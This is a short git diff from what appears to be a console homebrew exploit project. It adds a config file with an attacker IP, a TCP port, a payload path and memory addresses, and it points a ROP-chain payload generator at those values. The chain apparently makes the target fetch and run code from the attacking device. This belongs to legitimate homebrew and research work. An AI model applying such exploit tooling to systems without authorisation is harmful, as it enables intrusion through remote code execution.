diff --git a/homebrew/config.py b/homebrew/config.py new file mode 100644 index 0000000..de73a4f --- /dev/null +++ b/homebrew/config.py @@ -0,0 +1,6 @@ +ATTACKER_IP = [192, 168, 178, 161] # IP of the device which runs the python scripts +TCP_SERVER_PORT = 12345 # A free usable port on the attacking device + +CODE_BIN_PATH = 'code.bin' # Path to the code.bin payload that will be executed +CODE_BIN_TARGET_ADDR = 0x011DE200 # Address where the payload should be copied to +CODE_BIN_ENTRYPOINT = CODE_BIN_TARGET_ADDR # Absolute address of the entrypoint of the copied payload diff --git a/homebrew/generate_payload.py b/homebrew/generate_payload.py index f93285d..6b3d78d 100644 --- a/homebrew/generate_payload.py +++ b/homebrew/generate_payload.py @@ -1,7 +1,8 @@ from tcp_ropchain import * +from config import * import struct -rop_chain = tcp_thread_ropchain(0x4D070000 + 0x14, [192,168,178,89], 12345) +rop_chain = tcp_thread_ropchain(0x4D070000 + 0x14, ATTACKER_IP, TCP_SERVER_PORT) with open('payload.s', 'w') as f: for val in rop_chain: